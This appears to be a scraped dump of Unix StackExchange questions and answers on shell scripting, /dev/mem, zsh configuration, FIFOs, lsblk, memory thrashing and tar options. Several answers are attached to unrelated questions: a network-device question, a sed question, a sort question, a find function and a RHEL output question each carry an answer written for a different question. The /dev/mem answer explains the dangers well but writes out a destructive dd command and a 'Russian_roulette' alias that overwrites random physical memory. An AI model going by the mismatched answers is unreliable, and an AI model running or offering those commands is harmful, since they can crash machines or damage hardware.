elif test "$CODE" = "B"
then
PN="com.vng.pubgmobile"
elif test "$CODE" = "b"
then
PN="com.vng.pubgmobile"
elif test "$CODE" = "C"
then
PN="com.pubg.krmobile"
elif test "$CODE" = "c"
then
PN="com.pubg.krmobile"
elif test "$CODE" = "D"
then
PN="com.rekoo.pubgm"
elif test "$CODE" = "d"
then
PN="com.rekoo.pubgm"
else
echo -e "\a\t ERROR!"
echo -e "\a\t CODE KOSONG"
echo -e "\a\t MELAKUKAN EXIT OTOMATIS"
exit
fi | Use a case statement (portable, works in any sh -like shell): case "$CODE" in
[aA] ) PN="com.tencent.ig" ;;
[bB] ) PN="com.vng.pubgmobile" ;;
[cC] ) PN="com.pubg.krmobile" ;;
[dD] ) PN="com.rekoo.pubgm" ;;
* ) printf '\a\t%s\n' 'ERROR!' 'CODE KOSONG' 'MELAKUKAN EXIT OTOMATIS' >&2
exit 1 ;;
esac I'd also recommend changing your variable names from all capital letters (like CODE ) to something lower- or mixed-case (like code or Code ). There are many all-caps names that have special meanings, and re-using one of them by accident can cause trouble. Other notes: The standard convention is to send error messages to "standard error" rather than "standard output"; the >&2 redirect does this. Also, if a script (or program) fails, it's best to exit with a nonzero status ( exit 1 ), so any calling context can tell what went wrong. It's also possible to use different statuses to indicate different problems (see the "EXIT CODES" section of the curl man page for a good example). (Credit to Stéphane Chazelas and Monty Harder for suggestions here.) I recommend printf instead of echo -e (and echo -n ), because it's more portable between OSes, versions, settings, etc. I once had a bunch of my scripts break because an OS update included a version of bash compiled with different options, which changed how echo behaved. The double-quotes around $CODE aren't really needed here. The string in a case is one of the few contexts where it's safe to leave them off. However, I prefer to double-quote variable references unless there's a specific reason not to, because it's hard to keep track of where it's safe and where it isn't, so it's safer to just habitually double-quote them. | {
"source": [
"https://unix.stackexchange.com/questions/531795",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/363485/"
]
} |
531,812 | I wanted to know if there is a way to differentiate physical and virtual network devices. ip a doesn't have an option. So I am trying /sys/class/net/<iface> .
There are 2 attributes addr_assign_type and type, but type only tells Ethernet or loopback there is not way to tell if its virtual. I wanted to know does addr_assign_type tell us the different? As per my observation /sys/class/net/<iface>/{eth|loopback} gives 0 and /sys/class/net/<iface>/{virtualdevice} gives 1 or 3 . Is there something I can infer from this? | Use a case statement (portable, works in any sh -like shell): case "$CODE" in
[aA] ) PN="com.tencent.ig" ;;
[bB] ) PN="com.vng.pubgmobile" ;;
[cC] ) PN="com.pubg.krmobile" ;;
[dD] ) PN="com.rekoo.pubgm" ;;
* ) printf '\a\t%s\n' 'ERROR!' 'CODE KOSONG' 'MELAKUKAN EXIT OTOMATIS' >&2
exit 1 ;;
esac I'd also recommend changing your variable names from all capital letters (like CODE ) to something lower- or mixed-case (like code or Code ). There are many all-caps names that have special meanings, and re-using one of them by accident can cause trouble. Other notes: The standard convention is to send error messages to "standard error" rather than "standard output"; the >&2 redirect does this. Also, if a script (or program) fails, it's best to exit with a nonzero status ( exit 1 ), so any calling context can tell what went wrong. It's also possible to use different statuses to indicate different problems (see the "EXIT CODES" section of the curl man page for a good example). (Credit to Stéphane Chazelas and Monty Harder for suggestions here.) I recommend printf instead of echo -e (and echo -n ), because it's more portable between OSes, versions, settings, etc. I once had a bunch of my scripts break because an OS update included a version of bash compiled with different options, which changed how echo behaved. The double-quotes around $CODE aren't really needed here. The string in a case is one of the few contexts where it's safe to leave them off. However, I prefer to double-quote variable references unless there's a specific reason not to, because it's hard to keep track of where it's safe and where it isn't, so it's safer to just habitually double-quote them. | {
"source": [
"https://unix.stackexchange.com/questions/531812",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/363767/"
]
} |
532,134 | Why isn't there a ; character after do in shell loops when written on a single line? Here's what I mean. When written on a multiple lines, a for loop looks like: $ for i in $(jot 2)
> do
> echo $i
> done And on a single line: $ for i in $(jot 2); do echo $i; done All the collapsed lines get a ; after them except for the do line, and if you include the ; , it is an error. Someone probably a heck of a lot smarter than me decided that this was the right thing to do for a reason, but I can't figure out what the reason is. It seems inconsistent to me. The same with while loops too. $ while something
> do
> anotherthing
> done
$ while something; do anotherthing; done | That is the syntax of the command. See Compound Commands for name [ [in [words …] ] ; ] do commands; done Note specifically: do commands Most people put the do and commands on a separate line to allow for easier readability but it is not necessary, you could write: for i in thing
do something
done I know this question is specifically about shell and I have linked to the bash manual. It is not written that way in the shell manual but it is written that way in an article written by Stephen Bourne for byte magazine. Stephen says: A command list is a sequence of one or more simple commands separated or terminated by a newline or ; (semicolon). Furthermore, reserved words like do and done are normally preceded by a newline or ; ... In turn each time the command list following do is executed. | {
"source": [
"https://unix.stackexchange.com/questions/532134",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/235518/"
]
} |
532,381 | What exactly does this do? I don't understand how you could access base memory with this...seems kinda weird. Is it safe? dd if=/dev/urandom of=/dev/mem | Don't try this at home! It can crash your system, and if you're really unlucky it could damage a peripheral or make your computer unbootable. Actually, on most platforms, it just fails with an error, but that depends on the hardware architecture. There is most definitely no guarantee that this is harmless unless you run the command as an unprivileged user. With an unprivileged user, the command is perfectly harmless because you can't open /dev/mem . When you run a command as root, you're supposed to know what you're doing. The kernel will sometimes prevent you from doing something dangerous, but not always. /dev/mem is one of those potentially dangerous things where you're really supposed to know what you're doing. I'm going to walk through how a write to /dev/mem works on Linux. The general principle would be the same on other Unices, but things like kernel options are completely different. What happens when a process reads or writes to a device file is up to the kernel. An access to a device file runs some code in the driver that handles this device file. For example, writing to /dev/mem invokes the function write_mem in drivers/char/mem.c . This function takes 4 arguments: a data structure that represents the open file, a pointer to the data to write, the number of bytes to write, and the current position in the file. Note that you only get that far if the caller had permission to open the file in the first place. Device files obey file permissions normally. The normal permissions of /dev/mem are crw-r----- owned by root:kmem , so if you try to open it for writing without being root, you'll just get “permission denied” (EACCESS). But if you're root (or if root has changed the permissions of this file), the opening goes through and then you can attempt a write. The code in the write_mem function makes some sanity checks, but these checks aren't enough to protect against everything bad. The first thing it does is convert the current file position *ppos to a physical address. If that fails (in practice, because you're on a platform with 32-bit physical addresses but 64-bit file offsets and the file offset is larger than 2^32), the write fails with EFBIG (file too large). The next check is whether the range of physical addresses to write is valid on this particular processor architecture, and there a failure results in EFAULT (bad address). Next, on Sparc and m68k, any part of the write in the very first physical page is silently skipped. We've now reached the main loop which iterates over the data in blocks that can fit within one MMU page. /dev/mem accesses physical memory, not virtual memory, but the processor instructions to load and store data in memory use virtual addresses, so the code needs to arrange to map the physical memory at some virtual address. On Linux, depending on the processor architecture and the kernel configuration, this mapping either exists permantently or has to be made on the fly; that's the job of xlate_dev_mem_ptr (and unxlate_dev_mem_ptr undoes whatever xlate_dev_mem_ptr does). Then the function copy_from_user reads from the buffer that was passed to the write system call and just writes to the virtual address where the physical memory is currently mapped. The code emits normal memory store instructions, and what this means is up to the hardware. Before I discuss that a write to a physical address does, I'll discuss a check that happens before this write. Inside the loop, the function page_is_allowed blocks accesses to certain addresses if the kernel configuration option CONFIG_STRICT_DEVMEM is enabled (which is the case by default): only addresses allowed by devmem_is_allowed can be reached through /dev/mem , for others the write fails with EPERM (operation not permitted). The description of this option states: If this option is switched on, and IO_STRICT_DEVMEM=n, the /dev/mem file only allows userspace access to PCI space and the BIOS code and data regions. This is sufficient for dosemu and X and all common users of /dev/mem. This is very x86-centric description. In fact, more generically, CONFIG_STRICT_DEVMEM blocks access to physical memory addresses that map to RAM, but allows access to addresses that don't map to RAM. The details of what ranges of physical address are allowed depend on the processor architecture, but all of them exclude the RAM where data of the kernel and of user land processes is stored.
The additional option CONFIG_IO_STRICT_DEVMEM (disabled as of Ubuntu 18.04) blocks accesses to physical addresses that are claimed by a driver. Physical memory addresses that map to RAM . So there are physical memory addresses that don't map to RAM? Yes. That's the discussion I promised above about what it means to write to an address. A memory store instruction does not necessarily write to RAM. The processor decomposes the address and decides which peripheral to dispatch the store to. (When I say “the processor”, I encompass peripheral controllers which may not come from the same manufacturer.) RAM is only one of those peripherals. How the dispatch is done is very dependent on the processor architecture, but the fundamentals are more or less the same on all architectures. The processor basically decomposes the higher bits of the address and looks them up in some tables that are populated based on hard-coded information, information obtained by probing some buses, and information configured by the software. A lot of caching and buffering may be involved, but in a nutshell, after this decomposition, the processor writes something (encoding both the target address and the data that's being stored) on some bus and then it's up to the peripheral to deal with it. (Or the outcome of the table lookup might be that there is no peripheral at this address, in which case the processor enters a trap state where it executes some code in the kernel that normally results in a SIGBUS for the calling process.) A store to an address that maps to RAM doesn't “do” anything other than overwrite the value that was previously stored at this address, with the promise that a later load at the same address will give back the last stored value. But even RAM has a few addresses that don't behave this way: it has a few registers that can control things like refresh rate and voltage. In general, a read or write to a hardware register does whatever the hardware is programmed to do. Most accesses to hardware work this way: the software (normally kernel code) accesses a certain physical address, this reaches the bus that connects the processor to the peripheral, and the peripheral does its thing. Some processors (in particular x86) also have separate CPU instructions that cause reads/writes to peripherals which are distinct from memory load and store, but even on x86, many peripherals are reached through load/store. The command dd if=/dev/urandom of=/dev/mem writes random data to whatever peripheral is mapped at address 0 (and subsequent addresses, as long as the writes succeed). In practice, I expect that on many architectures, physical address 0 doesn't have any peripheral mapped to it, or has RAM, and therefore the very first write attempt fails. But if there is a peripheral mapped at address 0, or if you change the command to write to a different address, you'll trigger something unpredictable in the peripheral. With random data at increasing addresses, it's unlikely to do something interesting, but in principle it could turn off the computer (there's probably an address that does this in fact), overwrite some BIOS setting that makes it impossible to boot, or even hit some buggy peripheral in a way that damages it. alias Russian_roulette='dd if=/dev/urandom of=/dev/mem seek=$((4096*RANDOM+4096*32768*RANDOM))' | {
"source": [
"https://unix.stackexchange.com/questions/532381",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/364072/"
]
} |
532,548 | I just edited the .zshrc file to configure Z shell on FreeBSD, for example to update the PATH system variable. path+=/usr/local/openjdk12/bin How do I make the changes take effect? Must I log out and log in again? Is there a way to immediately run that file? | Restart zsh Zsh reads .zshrc when it starts. You don't need to log out and log back in. Just closing the terminal and opening a new one gives you your new .zshrc in this new terminal. But you can make this more direct. Just tell zsh to relaunch itself: exec zsh If you run this at a zsh prompt, this replaces the current instance of zsh by a new one, running in the same terminal. The new instance has the same environment variables as the previous one, but has fresh shell (non-exported) variables, and it starts a new history (so it'll mix in commands from other terminals in typical configurations). Any background jobs are disowned. Reread .zshrc You can also tell zsh to re-read .zshrc . This has the advantage of preserving the shell history, shell variables, and knowledge of background jobs. But depending on what you put in your .zshrc , this may or may not work. Re-reading .zshrc runs commands which may not work, or not work well, if you run them twice. . ~/.zshrc There are just too many things you can do to enumerate everything that's ok and not ok to put in .zshrc if you want to be able to run it twice. Here are just some common issues: If you append to a variable (e.g. fpath+=(~/.config/zsh) or chpwd_functions+=(my_chpwd) ), this appends the same elements again, which may or may not be a problem. If you define aliases, and also use the same name as a command, the command will now run the alias. For example, this works: function foo { … }
alias foo='foo --common-option' But this doesn't, because the second time the file is sourced, foo () will expand the alias: foo () { … }
alias foo='foo --common-option' If you patch an existing zsh function, you'll now be patching your own version, which will probably make a mess. If you do something like “swap the bindings of two keys”, that won't do what you want the second time. | {
"source": [
"https://unix.stackexchange.com/questions/532548",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/56752/"
]
} |
532,549 | i'm trying to insert variables before specific line in my script. this is the code that i'm using: var1=$(echo "database1=")
var2=$(echo "database2=")
var3=$(echo "database3=")
sed -i "/#variables/i \
$var1\
$var2\
$var3" /data1/create_database i expect that create_database be like this after i run above command: database1=
database2=
database3=
#variables but i get this result: database1= database2= database3=
#variables tried few ways nothing worked. what should i do? | Restart zsh Zsh reads .zshrc when it starts. You don't need to log out and log back in. Just closing the terminal and opening a new one gives you your new .zshrc in this new terminal. But you can make this more direct. Just tell zsh to relaunch itself: exec zsh If you run this at a zsh prompt, this replaces the current instance of zsh by a new one, running in the same terminal. The new instance has the same environment variables as the previous one, but has fresh shell (non-exported) variables, and it starts a new history (so it'll mix in commands from other terminals in typical configurations). Any background jobs are disowned. Reread .zshrc You can also tell zsh to re-read .zshrc . This has the advantage of preserving the shell history, shell variables, and knowledge of background jobs. But depending on what you put in your .zshrc , this may or may not work. Re-reading .zshrc runs commands which may not work, or not work well, if you run them twice. . ~/.zshrc There are just too many things you can do to enumerate everything that's ok and not ok to put in .zshrc if you want to be able to run it twice. Here are just some common issues: If you append to a variable (e.g. fpath+=(~/.config/zsh) or chpwd_functions+=(my_chpwd) ), this appends the same elements again, which may or may not be a problem. If you define aliases, and also use the same name as a command, the command will now run the alias. For example, this works: function foo { … }
alias foo='foo --common-option' But this doesn't, because the second time the file is sourced, foo () will expand the alias: foo () { … }
alias foo='foo --common-option' If you patch an existing zsh function, you'll now be patching your own version, which will probably make a mess. If you do something like “swap the bindings of two keys”, that won't do what you want the second time. | {
"source": [
"https://unix.stackexchange.com/questions/532549",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/314925/"
]
} |
532,578 | I've used the mkfifo <file> command to create named FIFOs, where one process writes to the file, and another process reads from the file. Now, I know the mknod command is able to create named pipes. Are these named pipes equivalent to the FIFOs created by mkfifo , or do they have different features? | Yes, it's equivalent, but obviously only if you tell mknod to actually create a FIFO, and not a block or character device (rarely done these days as devtmpfs/udev does it for you). mkfifo foobar
# same difference
mknod foobar p In strace it's identical for both commands: mknod("foobar", S_IFIFO|0666) = 0 So in terms of syscalls, mkfifo is actually shorthand for mknod . The biggest difference, then, is in semantics. With mkfifo you can create a bunch of FIFOs in one go: mkfifo a b c With mknod , since you have to specify the type, it only ever accepts one argument: # wrong:
$ mknod a b c p
mknod: invalid major device number ‘c’
# right:
mknod a p
mknod b p
mknod c p In general, mknod can be difficult to use correctly. So if you want to work with FIFO, stick to mkfifo . | {
"source": [
"https://unix.stackexchange.com/questions/532578",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/128739/"
]
} |
533,156 | If I try to start python in a bash script, the script will stop running and no commands will execute after "Python" is called. In this simple example, "TESTPRINT" will not be printed. It seems like the script just stops. #!/bin/bash
python
print("TESTPRINT")
Echo How do I make the script continue running after going into Python? I believe I had the same problem a few years ago after writing a script that first needed to shell into an Android Phone. I can't remember how I fixed it that time. | To run a set of Python commands from a bash script, you must give the Python interpreter the commands to run, either from a file (Python script) that you create in the script, as in #!/bin/bash -e
# Create script as "script.py"
cat >script.py <<'END_SCRIPT'
print("TESTPRINT")
END_SCRIPT
# Run script.py
python script.py
rm script.py (this creates a new file called script.py or overwrites that file if it already exists, and then instructs Python to run it; it is then deleted) ... or directly via some form of redirection, for example a here-document: #!/bin/bash
python - <<'END_SCRIPT'
print("TESTPRINT")
END_SCRIPT What this does is running python - which instructs the Python interpreter to read the script from standard input. The shell then sends the text of the Python script (delimited by END_SCRIPT in the shell script) to the Python process' standard input stream. Note that the two bits of code above are subtly different in that the second script's Python process has its standard input connected to the script that it's reading, while the first script's Python process is free to read data other than the script from standard input. This matters if your Python code reads from standard input. Python can also take a set of commands from the command line directly with its -c option: #!/bin/bash
python -c 'print("TESTPRINT")' What you can't do is to "switch to Python" in the middle of a bash script. The commands in a script is executed by bash one after the other, and while a command is executing, the script itself waits for it to terminate (if it's not a background job). This means that your original script would start Python in interactive mode, temporarily suspending the execution of the bash script until the Python process terminates. The script would then try to execute print("TESTPRINT") as a shell command. It's a similar issue with using ssh like this in a script: ssh user@server
cd /tmp
ls (which may possibly be similar to what you say you tried a few years ago). This would not connect to the remote system and run the cd and ls commands there. It would start an interactive shell on the remote system, and once that shell has terminated (giving control back to the script), cd and ls would be run locally. Instead, to execute the commands on a remote machine, use ssh user@server "cd /tmp; ls" (This is a lame example, but you may get the point). The below example shows how you may actually do what you propose. It comes with several warning label and caveats though, and you should never ever write code like this (because it's obfuscated and therefore unmaintainable and, dare I say it, downright bad). python -
print("TESTPRINT") Running it: $ sh -s <script.sh
TESTPRINT What happens here is that the script is being run by sh -s . The -s option to sh (and to bash ) tells the shell to execute the shell script arriving over the standard input stream. The script then starts python - , which tells Python to run whatever comes in over the standard input stream. The next thing on that stream, since it's inherited from sh -s by Python (and therefore connected to our script text file), is the Python command print("TESTPRINT") . The Python interpreter would then continue reading and executing commands from the script file until it runs out or executes the Python command exit() . | {
"source": [
"https://unix.stackexchange.com/questions/533156",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/364877/"
]
} |
533,161 | This is more about finding an elegant solution to a problem, I think I have a working solution. I have the following input file format, tab-separated, on an Ubuntu machine: AC003665.1 17 47813266 AGCAGGCGCA 83
RIOK3 18 23453502 GCAAGGCCCC 52
UBE2Z 17 48910880 CTAAGGATCC 48
CSNK1D 17 82251379 AATTTAGCCA 68
CSNK1D 17 82251379 AATTTCTTGT 38
SMURF1 7 99143726 GACAGATTGG 74
SMURF1 7 99143726 GACAGATTGG 61
RIOK3 18 23453502 GCAAGACTTT 69 I want to get only one line per occurence of field 3, the one that has the highest value in field 5. Output should therefore be : AC003665.1 17 47813266 AGCAGGCGCA 83
CSNK1D 17 82251379 AATTTAGCCA 68
UBE2Z 17 48910880 CTAAGGATCC 48
SMURF1 7 99143726 GACAGATTGG 74
RIOK3 18 23453502 GCAAGACTTT 69 Order is irrelevant for my purposes. I have found a solution that involves sorting first on field 5, and then on field 3, that I think works: sort -k 5,5nr input | sort -u -k 3,3n > output It works with all my test files and I think should work in any case, as this should ensure that for every value of field 3 the sorting will see first (and therefore keep) the line with the highest value for field 5. I however feel that there should be a more elegant (and maybe more foolproof) solution to that problem ? Any help is appreciated. | To run a set of Python commands from a bash script, you must give the Python interpreter the commands to run, either from a file (Python script) that you create in the script, as in #!/bin/bash -e
# Create script as "script.py"
cat >script.py <<'END_SCRIPT'
print("TESTPRINT")
END_SCRIPT
# Run script.py
python script.py
rm script.py (this creates a new file called script.py or overwrites that file if it already exists, and then instructs Python to run it; it is then deleted) ... or directly via some form of redirection, for example a here-document: #!/bin/bash
python - <<'END_SCRIPT'
print("TESTPRINT")
END_SCRIPT What this does is running python - which instructs the Python interpreter to read the script from standard input. The shell then sends the text of the Python script (delimited by END_SCRIPT in the shell script) to the Python process' standard input stream. Note that the two bits of code above are subtly different in that the second script's Python process has its standard input connected to the script that it's reading, while the first script's Python process is free to read data other than the script from standard input. This matters if your Python code reads from standard input. Python can also take a set of commands from the command line directly with its -c option: #!/bin/bash
python -c 'print("TESTPRINT")' What you can't do is to "switch to Python" in the middle of a bash script. The commands in a script is executed by bash one after the other, and while a command is executing, the script itself waits for it to terminate (if it's not a background job). This means that your original script would start Python in interactive mode, temporarily suspending the execution of the bash script until the Python process terminates. The script would then try to execute print("TESTPRINT") as a shell command. It's a similar issue with using ssh like this in a script: ssh user@server
cd /tmp
ls (which may possibly be similar to what you say you tried a few years ago). This would not connect to the remote system and run the cd and ls commands there. It would start an interactive shell on the remote system, and once that shell has terminated (giving control back to the script), cd and ls would be run locally. Instead, to execute the commands on a remote machine, use ssh user@server "cd /tmp; ls" (This is a lame example, but you may get the point). The below example shows how you may actually do what you propose. It comes with several warning label and caveats though, and you should never ever write code like this (because it's obfuscated and therefore unmaintainable and, dare I say it, downright bad). python -
print("TESTPRINT") Running it: $ sh -s <script.sh
TESTPRINT What happens here is that the script is being run by sh -s . The -s option to sh (and to bash ) tells the shell to execute the shell script arriving over the standard input stream. The script then starts python - , which tells Python to run whatever comes in over the standard input stream. The next thing on that stream, since it's inherited from sh -s by Python (and therefore connected to our script text file), is the Python command print("TESTPRINT") . The Python interpreter would then continue reading and executing commands from the script file until it runs out or executes the Python command exit() . | {
"source": [
"https://unix.stackexchange.com/questions/533161",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/364876/"
]
} |
533,183 | I have created this bash function to recursively find a file. ff() {
find . -type f -name '$1'
} However, it returns no results. When I execute the command directly on the commandline, I do get results. I am not sure why it behaves differently, as shown below. mattr@kiva-mattr:~/src/protocol$ ff *.so
mattr@kiva-mattr:~/src/protocol$ find . -type f -name '*.so'
./identity_wallet_service/resources/libindystrgpostgres.so Why does my function not work as expected? I am using MacOS and bash shell. Thnx
Matt | To run a set of Python commands from a bash script, you must give the Python interpreter the commands to run, either from a file (Python script) that you create in the script, as in #!/bin/bash -e
# Create script as "script.py"
cat >script.py <<'END_SCRIPT'
print("TESTPRINT")
END_SCRIPT
# Run script.py
python script.py
rm script.py (this creates a new file called script.py or overwrites that file if it already exists, and then instructs Python to run it; it is then deleted) ... or directly via some form of redirection, for example a here-document: #!/bin/bash
python - <<'END_SCRIPT'
print("TESTPRINT")
END_SCRIPT What this does is running python - which instructs the Python interpreter to read the script from standard input. The shell then sends the text of the Python script (delimited by END_SCRIPT in the shell script) to the Python process' standard input stream. Note that the two bits of code above are subtly different in that the second script's Python process has its standard input connected to the script that it's reading, while the first script's Python process is free to read data other than the script from standard input. This matters if your Python code reads from standard input. Python can also take a set of commands from the command line directly with its -c option: #!/bin/bash
python -c 'print("TESTPRINT")' What you can't do is to "switch to Python" in the middle of a bash script. The commands in a script is executed by bash one after the other, and while a command is executing, the script itself waits for it to terminate (if it's not a background job). This means that your original script would start Python in interactive mode, temporarily suspending the execution of the bash script until the Python process terminates. The script would then try to execute print("TESTPRINT") as a shell command. It's a similar issue with using ssh like this in a script: ssh user@server
cd /tmp
ls (which may possibly be similar to what you say you tried a few years ago). This would not connect to the remote system and run the cd and ls commands there. It would start an interactive shell on the remote system, and once that shell has terminated (giving control back to the script), cd and ls would be run locally. Instead, to execute the commands on a remote machine, use ssh user@server "cd /tmp; ls" (This is a lame example, but you may get the point). The below example shows how you may actually do what you propose. It comes with several warning label and caveats though, and you should never ever write code like this (because it's obfuscated and therefore unmaintainable and, dare I say it, downright bad). python -
print("TESTPRINT") Running it: $ sh -s <script.sh
TESTPRINT What happens here is that the script is being run by sh -s . The -s option to sh (and to bash ) tells the shell to execute the shell script arriving over the standard input stream. The script then starts python - , which tells Python to run whatever comes in over the standard input stream. The next thing on that stream, since it's inherited from sh -s by Python (and therefore connected to our script text file), is the Python command print("TESTPRINT") . The Python interpreter would then continue reading and executing commands from the script file until it runs out or executes the Python command exit() . | {
"source": [
"https://unix.stackexchange.com/questions/533183",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/364914/"
]
} |
533,331 | My goal is to get the disks greater than 100G from lsblk. I have it working, but it's awkward. I'm pretty sure it can be shortened. Either by using something totally different than lsblk, or maybe I can filter human readable numbers directly with awk. Here's what I put together: lsblk | grep disk | awk '{print$1,$4}' | grep G | sed 's/.$//' | awk '{if($2>100)print$1}' It outputs only the sdx and nvmexxx part of the disks larger than 100G. Exactly what I need. I am happy with it, but am eager to learn more from you Gurus | You can specify the form of output you want from lsblk : % lsblk -nblo NAME,SIZE
mmcblk0 15931539456
mmcblk0p1 268435456
mmcblk0p2 15662038528 Options used : -b, --bytes
Print the SIZE column in bytes rather than in human-readable format.
-l, --list
Use the list output format.
-n, --noheadings
Do not print a header line.
-o, --output list
Specify which output columns to print. Use --help to get a list of all supported
columns. Then the filtering is easier: % lsblk -nblo NAME,SIZE | awk '$2 > 4*2^30 {print $1}' # greater than 4 GiB
mmcblk0
mmcblk0p2 In your case, that'd be 100*2^30 for 100GiB or 100e9 / 1e11 for 100GB. | {
"source": [
"https://unix.stackexchange.com/questions/533331",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/358708/"
]
} |
534,355 | I'm using Linux 4.15, and this happens to me many times when the RAM usage reaches its top - The whole OS becomes unresponsive, frozen and useless. The only thing I see it to be working is the disk (main system partition), which is massively in use. I don't know whether this issue is OS-specific, hardware-specific, or configuration-specific. Any ideas? | What can make Linux so unresponsive? Overcommitting available RAM, which causes a large amount of swapping, can definitely do this. Remember that random access I/O on your mechanical HDD requires moving a read/write head, which can only do around 100 seeks per second. It's usual for Linux to go totally out to lunch, if you overcommit RAM "too much". I also have a spinny disk and 8GB RAM. I have had problems with a couple of pieces of software with memory leaks. I.e. their memory usage keeps growing over time and never shrinks, so the only way to control it would have been to stop the software and then restart it. Based on the experiences I had during this, I am not very surprised to hear delays over ten minutes, if you are generating 3GB+ of swap. You won't necessarily see this in all cases where you have more than 3GB of swap. Theory says the key concept is thrashing . On the other hand, if you are trying to switch between two different working sets, and it requires swapping 3GB in and out, at 100MB/s it will take at least 60 seconds even if the I/O pattern can be perfectly optimized. In practice, the I/O pattern will be far from optimal. After the difficulty I had with this, I reformatted my swap space to 2GB (several times smaller than before), so the system would not be able to swap as deeply. You can do this even without messing around resizing the partition, because mkswap takes an optional size parameter. The rough balance is between running out of memory and having processes get killed, and having the system hang for so long that you give up and reboot anyway. I don't know if a 4GB swap partition is too large; it might depend what you're doing. The important thing is to watch out for when the disk starts churning, check your memory usage, and respond accordingly. Checking memory usage of multi-process applications is difficult. To see memory usage per-process without double-counting shared memory, you can use sudo atop -R , press M and m , and look in the PSIZE column. You can also use smem . smem -t -P firefox will show PSS of all your firefox processes, followed by a line with total PSS. This is the correct approach to measure total memory usage of Firefox or Chrome based browsers. (Though there are also browser-specific features for showing memory usage, which will show individual tabs). | {
"source": [
"https://unix.stackexchange.com/questions/534355",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/228308/"
]
} |
534,360 | Sorry for this very basic question. I work in a very small company as a developer and we are trying to help the infra team to setup a new environment. We are migrating from RHEL 5 32bits to RHEL 7 64 bists. We could install and parametrize properly the installation of SSH. Everything works except what I will call 'output tag' when we stop, start or restart the service. See photo below for a better understanding. I mean the [OK], [FAILED] that appears on the screen after using service sshd restart for example. The photo is just an example showing the tags. On RHEL 5 it works flawless. On RHEL 7 it works but I do NOT have the same output ([OK], [FAILED], etc) I think I am missing something. Did searches on google but could not find anything related to that. | What can make Linux so unresponsive? Overcommitting available RAM, which causes a large amount of swapping, can definitely do this. Remember that random access I/O on your mechanical HDD requires moving a read/write head, which can only do around 100 seeks per second. It's usual for Linux to go totally out to lunch, if you overcommit RAM "too much". I also have a spinny disk and 8GB RAM. I have had problems with a couple of pieces of software with memory leaks. I.e. their memory usage keeps growing over time and never shrinks, so the only way to control it would have been to stop the software and then restart it. Based on the experiences I had during this, I am not very surprised to hear delays over ten minutes, if you are generating 3GB+ of swap. You won't necessarily see this in all cases where you have more than 3GB of swap. Theory says the key concept is thrashing . On the other hand, if you are trying to switch between two different working sets, and it requires swapping 3GB in and out, at 100MB/s it will take at least 60 seconds even if the I/O pattern can be perfectly optimized. In practice, the I/O pattern will be far from optimal. After the difficulty I had with this, I reformatted my swap space to 2GB (several times smaller than before), so the system would not be able to swap as deeply. You can do this even without messing around resizing the partition, because mkswap takes an optional size parameter. The rough balance is between running out of memory and having processes get killed, and having the system hang for so long that you give up and reboot anyway. I don't know if a 4GB swap partition is too large; it might depend what you're doing. The important thing is to watch out for when the disk starts churning, check your memory usage, and respond accordingly. Checking memory usage of multi-process applications is difficult. To see memory usage per-process without double-counting shared memory, you can use sudo atop -R , press M and m , and look in the PSIZE column. You can also use smem . smem -t -P firefox will show PSS of all your firefox processes, followed by a line with total PSS. This is the correct approach to measure total memory usage of Firefox or Chrome based browsers. (Though there are also browser-specific features for showing memory usage, which will show individual tabs). | {
"source": [
"https://unix.stackexchange.com/questions/534360",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/365938/"
]
} |
535,772 | I want to make sure I understand the following code: tar xvzf FILE --exclude-from=exclude.me --strip-components 1 -C DESTINATION which was posted in this answer . From man tar : --strip-components=NUMBER strip NUMBER leading components from file names on extraction -C , --directory=DIR change to directory DIR I didn't understand the manual explanation for --strip-components . About -C , I understood that it means something like "put stripped components in a noted directory." What does --strip-components -C mean? | The fragment of manpage you included in your question comes from man
for GNU tar. GNU is a software project that prefers info manuals
over manpages. In fact, tar manpage has been added to the GNU tar
source code tree only in
2014 and it still is just a reference, not a full-blown manual with
examples. You can invoke a full info manual with info tar , it's
also available online here . It contains
several examples of --strip-components usage, the relevant fragments
are: --strip-components=number Strip given number of leading components from file names before extraction. For example, if archive `archive.tar' contained `some/file/name', then running tar --extract --file archive.tar --strip-components=2 would extract this file to file `name'. and: --strip-components=number Strip given number of leading components from file names before extraction. For example, suppose you have archived whole `/usr' hierarchy to a tar archive named `usr.tar'. Among other files, this archive contains `usr/include/stdlib.h', which you wish to extract to the current working directory. To do so, you type: $ tar -xf usr.tar --strip=2 usr/include/stdlib.h The option `--strip=2' instructs tar to strip the two leading components (`usr/' and `include/') off the file name. That said; There are other implementations of tar out there, for example FreeBSD
tar manpage has a
different explanation of this command: --strip-components count Remove the specified number of leading path elements. Pathnames
with fewer elements will be silently skipped. Note that the
pathname is edited after checking inclusion/exclusion patterns
but before security checks. In other words, you should understand a Unix path as a sequence of
elements separated by / (unless there is only one / ). Here is my own example (other examples are available in the info manual I linked to above): Let's create a new directory structure: mkdir -p a/b/c Path a/b/c is composed of 3 elements: a , b , and c . Create an empty file in this directory and put it into .tar archive: $ touch a/b/c/FILE
$ tar -cf archive.tar a/b/c/FILE FILE is a 4th element of a/b/c/FILE path. List contents of archive.tar: $ tar tf archive.tar
a/b/c/FILE You can now extract archive.tar with --strip-components and an
argument that will tell it how many path elements you want to be removed from the a/b/c/FILE when extracted. Remove an original a directory: rm -r a Extract with --strip-components=1 - only a has not been recreated: $ tar xf archive.tar --strip-components=1
$ ls -Al
total 16
-rw-r--r-- 1 ja users 10240 Mar 26 15:41 archive.tar
drwxr-xr-x 3 ja users 4096 Mar 26 15:43 b
$ tree b
b
└── c
└── FILE
1 directory, 1 file With --strip-components=2 you see that a/b - 2 elements have not
been recreated: $ rm -r b
$ tar xf archive.tar --strip-components=2
$ ls -Al
total 16
-rw-r--r-- 1 ja users 10240 Mar 26 15:41 archive.tar
drwxr-xr-x 2 ja users 4096 Mar 26 15:46 c
$ tree c
c
└── FILE
